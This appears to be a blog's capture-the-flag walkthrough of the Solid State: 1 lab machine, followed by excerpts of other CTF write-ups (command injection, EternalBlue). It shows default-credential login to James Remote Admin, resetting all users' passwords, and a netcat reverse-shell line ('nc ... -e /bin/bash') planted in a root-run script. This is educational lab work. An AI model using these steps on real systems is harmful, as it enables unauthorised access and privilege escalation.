HackTheBox Solid State: 1 Walkthrough

Lab Environment


Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
Vulnerable Machine : Solid State: 1
Let’s start hacking and breach the security of this machine


Scanning Phase : Let’s start with knowing our attacking machine’s ip
        Syntax used : ifconfig
                Results : 192.168.146.131
Now let’s scan our local network to which attacking machine and vulnerable machine is connected.
      Syntax used : arp-scan --local
                  Victim machine : 192.168.146.133
Enumeration Phase : Now using nmap to scan the services running on ports .
    Syntax used : nmap -A 192.168.146.133 -p- --open -Pn
     Results : http service is active on port 80 , pop3 is active on port 110
and james admin on port 4555
Now browsing ip in desired browser to see the webpage on port 80


Now trying to connect to port 4555 using telnet
Syntax used: telnet 192.168.146.133 4555
Results : i got prompt to provide login id
Note: above image shows that it is james remote admin which is asking for login id .
So , I tried google and got one exploit of james remote admin .
In code I found default login credentials of james remote admin.
Default credentials : user = root and pwd = root


Now providing the credentials in prompt , I got something useful .
I have used telnet commands in this .

Command : listusers
Command : setpassword username password
Explanation :  setpassword > to set the new pass
Username : of which the pass is to be changed
Password : new password

So i changed passwords for all the users to ‘paras’
Now , trying to connect with pop3 using telnet
Syntax used : telnet 192.168.146.133 110
Results : I got connected and used telnet commands to enter as a mindy
Commands used: user mindy
       Pass paras
       Retr 2 (to retrieve all the data)
Now with above creds trying to login in ssh
Syntax used : ssh mindy@192.168.146.133
Pass for mindy : P@55W0rd1!2@
Results : low privileged shell and user flag

Now making our own python code and storing it into tmp.py of victim machine
and simultaneously fired up netcat to listen on port 9999 which is used in script .
Again login in ssh with the following command
Ssh mindy@192.168.146.133 ‘export TERM=xterm python -c ‘import pty; pty.spawn(“/bin/bash”)’
And after that execute with netcat in running state simultaneously.
echo ‘import os; os.system(“/bin/nc 192.168.146.131 9999 -e /bin/bash”)’ > /opt/tmp.py
Results : root flag

Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

CTF - Dina : 1.0.1 walkthrough

Image
     Lab Environment  : Attacker’s Machine :  Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux Vulnerable Machine : Dina: 1.0.1 Scanning phase route -n (To know the gateway) i.e 172.16.60.2 arp-scan --local (to know the devices connected to the local network)   Vulnerable machine IP : 172.16.60.154           Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154 We got one open port i.e 80 and http service is active Since the port 80 is open and http service is active then we can open the IP in browser.   Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154 Now further using dirb for scanning the directories : dirb http://172.16.60.154 Some results are obtained after using dirb .  Opened the http://172.16.60.154/robots.txt and found something interesti
Read more